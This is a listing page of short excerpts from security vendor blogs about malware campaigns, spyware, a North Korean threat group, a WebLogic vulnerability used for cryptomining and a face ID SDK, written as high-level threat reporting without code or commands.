Avzhan DDoS bot dropped by Chinese drive-by attack

The Avzhan DDoS bot is back in the wild again, this time being dropped by a Chinese drive-by attack. In this post, we'll take a deep dive into its functionality and compare the sample we captured with the one described in the past. Categories: Malware Threat analysis Tags: avzhanBotbotnetddosdrive-by attackexploit kitmalware (Read more...) The post Avzhan DDoS bot dropped by Chinese drive-by attack appeared first on Malwarebytes Labs.
Read more

Drive-by download campaign targets Chinese websites, experiments with exploits

This custom made drive-by download attack targets some Chinese websites and their visitors while experimenting with exploits. Categories: Threat analysis Tags: Chinesecoinhivedrive-byEKexploit kitexploitsFlash PlayerInternet Explorersvchost.exe (Read more...) The post Drive-by download campaign targets Chinese websites, experiments with exploits appeared first on Malwarebytes Labs.
Read more

Avast tracks down Tempting Cedar Spyware

A few months ago, one of our customers contacted us regarding strange messages he received on Facebook Messenger. The messages came from fake Facebook profiles belonging to attractive, but fictitious women. These women encouraged him to download another chat application to continue their conversations. The chat application the women referred him to was spyware, disguised as the Kik Messenger app, distributed through a very convincing fake site.
Read more

As Facial Recognition Accelerates, VASCO Responds with a Face ID SDK

Face ID is fast becoming a differentiator for organizations that want to provide a frictionless mobile experience. While biometric authentication remains the exception and not yet the rule, the analyst community strongly believes digital businesses, especially banks, need to pay attention. For example, in the recent Hype Cycle for Digital Banking Transformation, 2017, Gartner recommends that digital businesses develop world-class capabilities in customer authentication, and specifically, biometric authentication. In response... Read more The post As Facial Recognition Accelerates, VASCO Responds with a Face ID SDK appeared first on VASCO Data Security - Blog.
Read more

What the Meuller/Russia Indictment Means for Cybersecurity

On Feb. 16, a federal grand jury in Washington, D.C. returned an indictment against 13 Russian citizens and three Russian companies for a scheme involving information warfare against the political institutions of the United States. Does this portend a new strategy for dealing with cyberthreats or is this merely political theater? The answer, of course,..
Read more

Encryption 101: a malware analyst’s primer

A primer on encryption mechanisms and how they are exploited by malware authors, including an introduction to encryption and the main methods used to encrypt ransomware. Categories: Threat analysis Tags: 101encryptionransomware (Read more...) The post Encryption 101: a malware analyst’s primer appeared first on Malwarebytes Labs.
Read more

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper). Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123. Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations: Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including ...
Read more

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners. CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors. FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments. We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of...
Read more
Page 1 of 4212345...102030...Last »